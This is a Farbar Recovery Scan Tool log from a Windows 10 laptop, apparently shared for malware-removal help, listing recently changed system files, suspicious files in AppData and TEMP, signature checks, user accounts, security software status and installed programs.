2016-03-09 10:30 - 2016-02-23 08:17 - 00333312 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll
2016-03-09 10:30 - 2016-02-23 08:15 - 00539728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2016-03-09 10:30 - 2016-02-23 08:15 - 00033280 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups2.dll
2016-03-09 10:30 - 2016-02-23 07:59 - 00319488 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkBindingEngineMigPlugin.dll
2016-03-09 10:30 - 2016-02-23 07:59 - 00104960 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rasl2tp.sys
2016-03-09 10:30 - 2016-02-23 07:57 - 00189952 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupSvc.dll
2016-03-09 10:30 - 2016-02-23 07:45 - 06788608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2016-03-09 10:30 - 2016-02-23 07:42 - 00771072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2016-03-09 10:30 - 2016-02-23 07:42 - 00091648 _____ (Microsoft Corporation) C:\WINDOWS\system32\asycfilt.dll
2016-03-09 10:30 - 2016-02-23 07:38 - 02663424 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Logon.dll
2016-03-09 10:30 - 2016-02-23 07:37 - 00057344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetCfgNotifyObjectHost.exe
2016-03-09 10:30 - 2016-02-23 07:36 - 00281600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetSetupShim.dll
2016-03-09 10:30 - 2016-02-23 07:25 - 00303104 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll
2016-03-09 10:30 - 2016-02-23 07:18 - 00031232 _____ (Microsoft Corporation) C:\WINDOWS\system32\seclogon.dll
2016-03-09 10:30 - 2016-02-23 07:17 - 00133120 _____ (Microsoft Corporation) C:\WINDOWS\system32\browser.dll
2016-03-09 10:30 - 2016-02-23 07:17 - 00058368 _____ (Microsoft Corporation) C:\WINDOWS\system32\browcli.dll
2016-03-09 10:30 - 2016-02-23 07:14 - 00841728 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32spl.dll
2016-03-09 10:30 - 2016-02-23 07:08 - 00081920 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxSysprep.dll
2016-03-09 10:30 - 2016-02-23 07:04 - 00225792 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsqmcons.exe
2016-03-09 10:30 - 2016-02-23 07:03 - 00450560 _____ (Microsoft Corporation) C:\WINDOWS\system32\werui.dll
2016-03-09 10:30 - 2016-02-23 07:03 - 00045568 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll
2016-03-09 10:30 - 2016-02-23 07:02 - 03587584 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2016-03-09 10:30 - 2016-02-23 06:55 - 14241792 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmp.dll
2016-03-09 10:30 - 2016-02-23 06:51 - 00915456 _____ (Microsoft Corporation) C:\WINDOWS\system32\configurationclient.dll
2016-03-09 10:30 - 2016-02-23 06:51 - 00678912 _____ (Microsoft Corporation) C:\WINDOWS\system32\scapi.dll
2016-03-09 10:30 - 2016-02-23 06:48 - 05157376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2016-03-09 10:30 - 2016-02-23 06:46 - 00400384 _____ (Microsoft Corporation) C:\WINDOWS\system32\sharemediacpl.dll
2016-03-09 10:30 - 2016-02-23 06:45 - 01844736 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMPDMC.exe
2016-03-09 10:30 - 2016-02-23 06:45 - 00574464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakradiag.dll
2016-03-09 10:30 - 2016-02-23 06:45 - 00088576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll
2016-03-09 10:30 - 2016-02-23 06:45 - 00078848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\asycfilt.dll
2016-03-09 10:30 - 2016-02-23 06:44 - 01821696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Logon.dll
2016-03-09 10:30 - 2016-02-23 06:29 - 00043520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\browcli.dll
2016-03-09 10:30 - 2016-02-23 06:17 - 00393728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\werui.dll
2016-03-09 10:30 - 2016-02-23 06:17 - 00037376 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll
2016-03-09 10:30 - 2016-02-23 06:11 - 12589056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmp.dll
2016-03-09 10:30 - 2016-02-23 06:03 - 01495040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMPDMC.exe
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-04-08 10:22 - 2015-07-30 18:42 - 00000000 ____D C:\WINDOWS\SysWOW64\GroupPolicy
2016-04-08 10:20 - 2009-07-13 23:20 - 00000000 ___HD C:\WINDOWS\system32\GroupPolicy
2016-04-08 10:10 - 2014-05-10 00:37 - 00000934 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-470165136-1162808608-978993673-1001UA.job
2016-04-08 10:07 - 2014-05-26 01:05 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2016-04-08 10:04 - 2011-02-19 00:22 - 00000932 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2016-04-08 09:48 - 2011-02-19 00:22 - 00000928 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2016-04-08 09:46 - 2015-07-30 17:52 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-04-08 09:30 - 2015-07-10 05:05 - 00524288 ___SH C:\WINDOWS\system32\config\BBI
2016-04-07 17:40 - 2015-07-30 18:42 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-04-07 16:20 - 2011-07-10 23:21 - 00000000 ____D C:\Users\RoNiN\AppData\LocalLow\Yahoo!
2016-04-07 16:10 - 2014-05-10 00:37 - 00000882 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-470165136-1162808608-978993673-1001Core.job
2016-04-07 14:52 - 2013-11-10 15:02 - 04126550 _____ C:\WINDOWS\ntbtlog.txt
2016-04-07 14:36 - 2015-07-30 18:42 - 00000000 ___SD C:\WINDOWS\Downloaded Program Files
2016-04-05 12:56 - 2015-10-03 04:40 - 00000000 ____D C:\Users\RoNiN
2016-03-29 18:38 - 2013-12-17 08:09 - 00000000 ____D C:\ProgramData\Oracle
2016-03-29 18:37 - 2015-03-13 11:03 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2016-03-29 18:37 - 2010-10-17 17:05 - 00000000 ____D C:\Program Files (x86)\Java
2016-03-29 18:33 - 2015-09-29 09:12 - 00000000 ____D C:\Users\RoNiN\.oracle_jre_usage
2016-03-29 18:32 - 2015-03-13 11:04 - 00097856 _____ (Oracle Corporation) C:\WINDOWS\SysWOW64\WindowsAccessBridge-32.dll
2016-03-29 09:21 - 2015-10-03 04:36 - 00006876 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-03-28 18:18 - 2015-07-30 18:42 - 00000000 ___HD C:\Program Files\WindowsApps
2016-03-25 15:28 - 2015-07-30 17:50 - 00000000 ____D C:\WINDOWS\Setup
2016-03-25 14:59 - 2015-07-12 09:18 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\03000200-1436707123-0500-0006-000700080009
2016-03-25 14:59 - 2015-07-12 09:17 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\03000200-1436707069-0500-0006-000700080009
2016-03-24 00:32 - 2013-07-11 06:09 - 00000000 ____D C:\Users\RoNiN\Update
2016-03-23 23:06 - 2011-02-19 00:22 - 00000000 ____D C:\Program Files (x86)\Google
2016-03-22 23:42 - 2015-07-12 09:38 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\03000200-1436708320-0500-0006-000700080009
2016-03-22 20:01 - 2015-10-01 18:30 - 00003582 _____ C:\WINDOWS\System32\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-470165136-1162808608-978993673-1001
2016-03-22 20:01 - 2015-10-01 18:30 - 00003518 _____ C:\WINDOWS\System32\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-470165136-1162808608-978993673-1001
2016-03-22 18:59 - 2015-11-04 19:30 - 00000000 ____D C:\WINDOWS\Panther
2016-03-21 20:42 - 2015-09-27 14:51 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\foobar2000
2016-03-21 20:41 - 2015-09-27 14:49 - 03875496 _____ (foobar2000.org) C:\Users\RoNiN\Downloads\foobar2000_v1.3.8.exe
2016-03-14 22:36 - 2015-07-30 18:40 - 00000000 ____D C:\WINDOWS\INF
2016-03-14 19:01 - 2013-11-10 15:08 - 00000000 ____D C:\WINDOWS\pss
2016-03-13 19:51 - 2011-12-12 02:14 - 00000008 __RSH C:\ProgramData\ntuser.pol
2016-03-13 19:21 - 2015-02-14 12:26 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\TeamViewer
2016-03-13 19:21 - 2011-03-24 03:30 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\Mozilla
2016-03-13 17:24 - 2015-07-30 18:25 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-03-13 14:00 - 2015-09-10 01:42 - 00000000 __RHD C:\Users\Public\AccountPictures
2016-03-13 13:02 - 2016-01-13 09:24 - 00000000 ____D C:\WINDOWS\SysWOW64\NV
2016-03-13 13:02 - 2016-01-13 09:24 - 00000000 ____D C:\WINDOWS\system32\NV
2016-03-11 19:12 - 2015-07-12 12:14 - 00000000 ____D C:\ProgramData\Package Cache
2016-03-10 23:34 - 2015-07-30 17:49 - 00342192 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2016-03-10 23:27 - 2015-07-30 18:42 - 00000000 ____D C:\Program Files\Windows Portable Devices
2016-03-10 23:27 - 2015-07-30 18:42 - 00000000 ____D C:\Program Files\Windows Multimedia Platform
2016-03-10 23:27 - 2015-07-30 18:42 - 00000000 ____D C:\Program Files (x86)\Windows Portable Devices
2016-03-10 23:27 - 2015-07-30 18:42 - 00000000 ____D C:\Program Files (x86)\Windows Multimedia Platform
2016-03-10 23:23 - 2010-10-24 03:29 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\Azureus
2016-03-10 23:20 - 2010-11-03 00:18 - 00000000 ____D C:\Users\RoNiN\Documents\Vuze Downloads
2016-03-09 18:46 - 2010-10-17 17:13 - 00000000 ____D C:\Program Files (x86)\The GodFather
2016-03-09 18:12 - 2013-09-15 20:36 - 00000000 ____D C:\WINDOWS\system32\MRT
2016-03-09 17:36 - 2010-10-16 20:41 - 143659408 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
 
==================== Files in the root of some directories =======
 
2016-03-13 19:24 - 2016-03-13 19:47 - 6000640 _____ () C:\Program Files (x86)\GUTD8C6.tmp
2016-03-11 19:39 - 2016-03-11 19:39 - 7600640 _____ () C:\Users\RoNiN\AppData\Roaming\agent.dat
2014-02-13 05:53 - 2014-02-13 05:53 - 0000268 ___RH () C:\Users\RoNiN\AppData\Roaming\Ambient
2014-02-13 05:54 - 2014-02-13 05:54 - 0000268 ___RH () C:\Users\RoNiN\AppData\Roaming\Analog Mono
2014-02-13 05:53 - 2014-02-13 05:53 - 0000268 ___RH () C:\Users\RoNiN\AppData\Roaming\Analog Pad
2015-10-29 09:35 - 2015-10-29 09:35 - 0000093 _____ () C:\Users\RoNiN\AppData\Roaming\ARCompanion.log
2016-03-11 19:38 - 2016-03-11 19:38 - 0072729 _____ () C:\Users\RoNiN\AppData\Roaming\Dripsoling.tst
2015-04-19 08:20 - 2015-04-19 08:20 - 0005872 _____ () C:\Users\RoNiN\AppData\Roaming\GWB6hPAk0e6t
2016-03-11 19:32 - 2016-03-11 19:32 - 0127488 _____ () C:\Users\RoNiN\AppData\Roaming\Installer.dat
2016-03-11 19:39 - 2016-03-11 19:39 - 0018432 _____ () C:\Users\RoNiN\AppData\Roaming\Main.dat
2016-03-11 19:39 - 2016-03-11 19:39 - 1786944 _____ () C:\Users\RoNiN\AppData\Roaming\Silflex.tst
2016-03-21 19:35 - 2016-03-21 19:35 - 0000046 _____ () C:\Users\RoNiN\AppData\Roaming\WB.CFG
2011-03-09 00:31 - 2012-12-28 02:36 - 0004608 _____ () C:\Users\RoNiN\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2011-09-04 17:15 - 2011-09-04 18:54 - 0044224 _____ () C:\Users\RoNiN\AppData\Local\RAContactHistory.xml
2014-01-13 08:41 - 2015-05-10 15:55 - 0007599 _____ () C:\Users\RoNiN\AppData\Local\Resmon.ResmonCfg
2016-03-09 18:03 - 2016-03-09 18:03 - 0002560 _____ () C:\Users\RoNiN\AppData\Local\uninstall.exe
2012-11-05 05:50 - 2012-11-05 05:50 - 0000026 ____H () C:\ProgramData\.811261211181235583101118113995
2010-12-13 23:04 - 2011-03-23 01:59 - 0000083 ___SH () C:\ProgramData\.zreglib
2012-05-27 21:35 - 2012-05-27 21:35 - 0000057 _____ () C:\ProgramData\Ament.ini
2014-02-13 05:53 - 2014-02-13 05:53 - 0000268 ___RH () C:\ProgramData\Analog Sync
2014-02-13 05:54 - 2014-02-13 05:54 - 0000268 ___RH () C:\ProgramData\Animals
2014-02-13 05:53 - 2014-02-13 05:53 - 0000268 ___RH () C:\ProgramData\Applause and Laugher
2010-10-17 21:03 - 2010-10-17 21:03 - 0004998 _____ () C:\ProgramData\bltofzsb.qlf
2015-03-01 21:31 - 2015-03-01 21:31 - 0004939 _____ () C:\ProgramData\flwjycbm.bab
2012-02-07 03:14 - 2015-02-21 16:19 - 0001385 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc
2014-02-13 05:54 - 2014-02-13 05:54 - 0000020 ____H () C:\ProgramData\PKP_DLes.DAT
2014-02-13 05:53 - 2015-06-25 13:12 - 0000020 ____H () C:\ProgramData\PKP_DLet.DAT
2014-02-13 05:53 - 2015-09-27 23:45 - 0000020 ____H () C:\ProgramData\PKP_DLev.DAT
2015-07-12 12:16 - 2015-07-12 12:22 - 0000112 _____ () C:\ProgramData\WceNM3o.dat
 
Files to move or delete:
====================
C:\Users\RoNiN\AppData\Local\Temp\DeleteOnReboot.bat
C:\ProgramData\WceNM3o.dat
C:\Users\RoNiN\autoplaylist.dat
C:\Users\RoNiN\cddbcontrol.dll
C:\Users\RoNiN\cddblink.dll
C:\Users\RoNiN\cddbmusicid.dll
C:\Users\RoNiN\convert.exe
C:\Users\RoNiN\dbghelp.dll
C:\Users\RoNiN\dunzip32.dll
C:\Users\RoNiN\fixrjb.exe
C:\Users\RoNiN\hxaudiodevicehook.dll
C:\Users\RoNiN\ierjplug.dll
C:\Users\RoNiN\keys.dat
C:\Users\RoNiN\mc_enc_h263.dll
C:\Users\RoNiN\mediainfo.dll
C:\Users\RoNiN\mmcdda32.dll
C:\Users\RoNiN\rdsf3260.dll
C:\Users\RoNiN\realcleaner.exe
C:\Users\RoNiN\realconverter.exe
C:\Users\RoNiN\realjbox.exe
C:\Users\RoNiN\realplay.exe
C:\Users\RoNiN\realshare.exe
C:\Users\RoNiN\realtrimmer.exe
C:\Users\RoNiN\rjbres.dll
C:\Users\RoNiN\rjdlg.dll
C:\Users\RoNiN\rjprog.dll
C:\Users\RoNiN\rjwmapln.dll
C:\Users\RoNiN\rndevicedbbuilder.exe
C:\Users\RoNiN\rpau3260.dll
C:\Users\RoNiN\rphelperapp.exe
C:\Users\RoNiN\rpplugprot.dll
C:\Users\RoNiN\rpshell.dll
C:\Users\RoNiN\rpshellextension.dll
C:\Users\RoNiN\rpshellsearch.dll
C:\Users\RoNiN\rpwa3260.dll
C:\Users\RoNiN\strs23.dat
C:\Users\RoNiN\strs26.dat
C:\Users\RoNiN\tnetdtct.dll
C:\Users\RoNiN\tpasdk.dll
C:\Users\RoNiN\tsasdk.dll
C:\Users\RoNiN\wmdmhelper.dll
 
 
Some files in TEMP:
====================
C:\Users\RoNiN\AppData\Local\Temp\392590059.exe
C:\Users\RoNiN\AppData\Local\Temp\523578965.exe
C:\Users\RoNiN\AppData\Local\Temp\ARCompanionForSession1.exe
C:\Users\RoNiN\AppData\Local\Temp\dsHostCheckerSetup.exe
C:\Users\RoNiN\AppData\Local\Temp\Execute2App.exe
C:\Users\RoNiN\AppData\Local\Temp\File_Downloader.exe
C:\Users\RoNiN\AppData\Local\Temp\i4jdel0.exe
C:\Users\RoNiN\AppData\Local\Temp\io1.exe
C:\Users\RoNiN\AppData\Local\Temp\jre-8u73-windows-au.exe
C:\Users\RoNiN\AppData\Local\Temp\JuniperSetupClientInstaller.exe
C:\Users\RoNiN\AppData\Local\Temp\lowproc.exe
C:\Users\RoNiN\AppData\Local\Temp\msvcp90.dll
C:\Users\RoNiN\AppData\Local\Temp\msvcr90.dll
C:\Users\RoNiN\AppData\Local\Temp\stubhelper.dll
 
 
==================== Bamital & volsnap =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2016-04-08 10:02
 
==================== End of FRST.txt ============================
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version:05-03-2016 01
Ran by RoNiN (2016-04-08 10:30:23)
Running from C:\virus
Windows 10 Home (X64) (2015-10-03 12:41:30)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-470165136-1162808608-978993673-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-470165136-1162808608-978993673-503 - Limited - Disabled)
Guest (S-1-5-21-470165136-1162808608-978993673-501 - Limited - Disabled)
Mcx1-RONIN-LAPTOP (S-1-5-21-470165136-1162808608-978993673-1013 - Limited - Enabled)
postgres (S-1-5-21-470165136-1162808608-978993673-1005 - Limited - Enabled) => C:\Users\postgres
RoNiN (S-1-5-21-470165136-1162808608-978993673-1001 - Administrator - Enabled) => C:\Users\RoNiN
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Emsisoft Anti-Malware (Enabled - Out of date) {15510D9D-6530-DA29-224F-7BA1BDD1CB58}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Emsisoft Anti-Malware (Enabled - Out of date) {AE30EC79-430A-D5A7-18FF-40D3C65681E5}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
888pokerNJ (HKLM-x32\...\888pokerNJ) (Version:  - )
abgx360 v1.0.6 (HKLM-x32\...\abgx360) (Version:  - )
AC3Filter (remove only) (HKLM-x32\...\AC3Filter) (Version:  - )
Acrobat.com (HKLM-x32\...\{287ECFA4-719A-2143-A09B-D6A12DE54E40}) (Version: 1.6.65 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 1.5.0.7220 - Adobe Systems Inc.)
Adobe Flash Player 10 ActiveX 64-bit (HKLM\...\Adobe Flash Player ActiveX 64) (Version: 10.2.161.23 - Adobe Systems Incorporated)
Adobe Flash Player 16 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 16.0.0.305 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.02) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.02 - Adobe Systems Incorporated)
Amazon Music (HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\Amazon Amazon Music) (Version: 3.1.0.570 - Amazon Services LLC)
AnswerWorks 5.0 English Runtime (HKLM-x32\...\{DBCC73BA-C69A-4BF5-B4BF-F07501EE7039}) (Version: 5.0.7 - Vantage Software Technologies)
AnyDVD (HKLM-x32\...\AnyDVD) (Version: 6.7.8.0 - SlySoft)
Apple Application Support (HKLM-x32\...\{83CAF0DE-8D3B-4C37-A631-2B8F16EC3031}) (Version: 3.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{BDD99690-3541-4619-9D2A-3CDDB3E15F9E}) (Version: 8.0.5.6 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
ArcSoft Magic-i Visual Effects 2 (HKLM-x32\...\{8E90189A-A5D4-4C0E-A908-06C4236F98EE}) (Version: 2.0.10.94 - ArcSoft)
ArcSoft Print Creations - Album Page (HKLM-x32\...\{E6B4117F-AC59-4B13-9274-EB136E8897EE}) (Version:  - ArcSoft)
ArcSoft Print Creations - Brochures & Flyers (HKLM-x32\...\{01A1A019-E1D8-482A-BE17-5E118D17C0A0}) (Version:  - ArcSoft)
ArcSoft Print Creations - Funhouse (HKLM-x32\...\{9591C049-5CAE-4E89-A8D9-191F1899628B}) (Version:  - ArcSoft)
ArcSoft Print Creations - Funhouse II (HKLM-x32\...\{3CE47E6B-AE27-4E40-AC54-329EED96B933}) (Version:  - ArcSoft)
ArcSoft Print Creations - Greeting Card (HKLM-x32\...\{F04F9557-81A9-4293-BC49-2C216FA325A7}) (Version:  - ArcSoft)
ArcSoft Print Creations - Photo Book (HKLM-x32\...\{56589DFE-0C29-4DFE-8E42-887B771ECD23}) (Version:  - ArcSoft)
ArcSoft Print Creations - Photo Calendar (HKLM-x32\...\{CA9ED5E4-1548-485B-A293-417840060158}) (Version:  - ArcSoft)
ArcSoft Print Creations - Photo Prints (HKLM-x32\...\{95F875CC-1B85-43E6-B3E0-13EA04F3D995}) (Version:  - ArcSoft)
ArcSoft Print Creations - Poster Creator (HKLM-x32\...\{5D1C82E7-7EC0-4404-A8AD-36C3B444BC34}) (Version:  - ArcSoft)
ArcSoft Print Creations - Scrapbook (HKLM-x32\...\{B0D83FCD-9D42-43ED-8315-250326AADA02}) (Version:  - ArcSoft)
ArcSoft Print Creations - Slimline Card (HKLM-x32\...\{007B37D9-0C45-4202-834B-DD5FAAE99D63}) (Version:  - ArcSoft)
ArcSoft Print Creations (HKLM-x32\...\{A3324BBB-3A83-40CE-AA8C-759D849B7EA1}) (Version: 3.0.255.487 - ArcSoft)
ArcSoft WebCam Companion 3 (HKLM-x32\...\{25478065-4CB1-448C-80E4-8C4529017EE3}) (Version: 3.0.32.354 - ArcSoft)
Avidemux 2.6 - 64 bits (HKLM-x32\...\Avidemux 2.6 - 64 bits (64-bit)) (Version: 2.6.10.150607 - )
AviSynth 2.5 (HKLM-x32\...\AviSynth) (Version:  - )
Battlelog Web Plugins (HKLM-x32\...\Battlelog Web Plugins) (Version: 2.6.2 - EA Digital Illusions CE AB)
BitTorrent (HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\BitTorrent) (Version: 7.9.2.38398 - BitTorrent Inc.)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
BovadaPoker (HKLM-x32\...\{D7CA2DF8-95CE-4C80-9296-98E21219A1E5}}_is1) (Version:   -  )
BurnRecovery (HKLM-x32\...\{2892E1B7-E24D-4CCB-B8A7-B63D4B66F89F}) (Version: 3.0.912.401 - Micro-Star International Co., Ltd.)
Canon MX870 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MX870_series) (Version:  - )
Chrome Remote Desktop Host (HKLM-x32\...\{EBFF2EA1-3944-4CA2-89FA-8B70C0058DD3}) (Version: 49.0.2623.40 - Google Inc.)
ChromecastApp (HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\{079ede36-133d-44b0-8053-c7c1fa8d2e0d}_is1) (Version: 1.5.1693.0 - Google Inc.)
Citrix Receiver (HKLM-x32\...\CitrixOnlinePluginPackWeb) (Version: 14.2.100.14 - Citrix Systems, Inc.)
DIRECTV Player (HKLM-x32\...\{dbaba6a3-366e-43a7-8f4e-b0a868c06ab3}) (Version: 10.0 - DIRECTV)
DIRECTV2PC Playback Advisor (HKLM-x32\...\InstallShield_{479F8C12-576B-4A58-AB78-4B70F7012AA8}) (Version: 1.0 - CyberLink Corp.)
DIRECTV2PC Playback Advisor (x32 Version: 1.0 - CyberLink Corp.) Hidden
DIRECTV2PC™ (HKLM-x32\...\InstallShield_{E9B10AA5-E5F6-4DEF-A435-FB20704AF1E8}) (Version: 2.0.7507 - CyberLink Corp.)
DIRECTV2PC™ (x32 Version: 2.0.7507 - CyberLink Corp.) Hidden
Doyles Room (HKLM-x32\...\78315C9D-B2DA-4430-B077-1BDA99CCB43D) (Version: 9.4 - IGSoft)
Ear Force Audio Hub (HKLM-x32\...\{64D69874-302B-4E2C-B18C-D79667822110}) (Version: 6.6.2.0 - Turtle Beach)
ELAN Touchpad 15.9.6.1_X64_WHQL (HKLM\...\Elantech) (Version: 15.9.6.1 - ELAN Microelectronic Corp.)
Emsisoft Anti-Malware (HKLM\...\{5502032C-88C1-4303-99FE-B5CBD7684CEA}_is1) (Version: 11.0 - Emsisoft Ltd.)
FairStars CD Ripper 1.90 (HKLM-x32\...\FairStars CD Ripper_is1) (Version:  - FairStars Soft)
FFB Racing Wheel drivers (HKLM-x32\...\{28B758EA-5C83-48B1-B352-C70F12C73F5A}) (Version: 2.TTRS.2015 - Thrustmaster)
Final Draft (HKLM-x32\...\{7C3C895B-AE02-4F30-8A6A-051D37A38DD0}) (Version: 8.0.1.89 - Final Draft, Inc.)
Firebird SQL Server - MAGIX Edition (HKLM-x32\...\{34EB6245-C8D0-4D8A-B8D8-EEBFF7A91485}) (Version: 2.1.27.0 - MAGIX AG)
foobar2000 v1.3.8 (HKLM-x32\...\foobar2000) (Version: 1.3.8 - Peter Pawlowski)
G-Force (HKLM-x32\...\G-Force) (Version: 4.2.0 - SoundSpectrum)
Gmail POP Troubleshooter (HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\GmailPopTroubleshooter) (Version: 0.1 - Google)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 49.0.2623.110 - Google Inc.)
Google Earth Plug-in (HKLM-x32\...\{4AB54F11-2F8C-11E3-B09F-B8AC6F97B88E}) (Version: 7.1.2.2041 - Google)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
gpedt.msc 1.0 (HKLM-x32\...\{10B9C608-BF7C-4CCF-A658-C01D969DCA21}_is1) (Version:  - Richard)
HP Photo Creations (HKLM-x32\...\HP Photo Creations) (Version: 1.0.0.5192 - HP Photo Creations)
HP Photosmart 6510 series Basic Device Software (HKLM\...\{EB0D4D8B-A604-42D3-84D8-CCAFA75F753E}) (Version: 24.0.342.0 - Hewlett-Packard Co.)
HP Photosmart 6510 series Help (HKLM-x32\...\{A2F95F8C-CDA9-4B08-BAD1-CA9656E4EC14}) (Version: 140.0.2.2 - Hewlett Packard)
iCloud (HKLM\...\{CE97E4D3-9F91-4D72-8A29-ED9EA90E5A15}) (Version: 2.1.3.25 - Apple Inc.)
ImgBurn (HKLM-x32\...\ImgBurn) (Version: 2.5.6.0 - LIGHTNING UK!)
Intel® Graphics Media Accelerator Driver (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2119 - Intel Corporation)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 6.0.0.1179 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 9.6.2.1001 - Intel Corporation)
Itibiti RTC (x32 Version: 0.0.1 - Itibiti Inc) Hidden
iTunes (HKLM\...\{2ABBBD91-91E5-4AD7-929A-FE15D1DC0576}) (Version: 12.0.1.26 - Apple Inc.)
Java 8 Update 77 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218077F0}) (Version: 8.0.770.3 - Oracle Corporation)
JDownloader (HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\JDownloader) (Version:  - AppWork UG (haftungsbeschränkt))
Junk Mail filter update (x32 Version: 14.0.8089.726 - Microsoft Corporation) Hidden
Live Update 5 (HKLM-x32\...\{E8BAA541-D161-4C9B-85BF-01F05A56BD7F}}_is1) (Version: 5.0.111 - MSI)
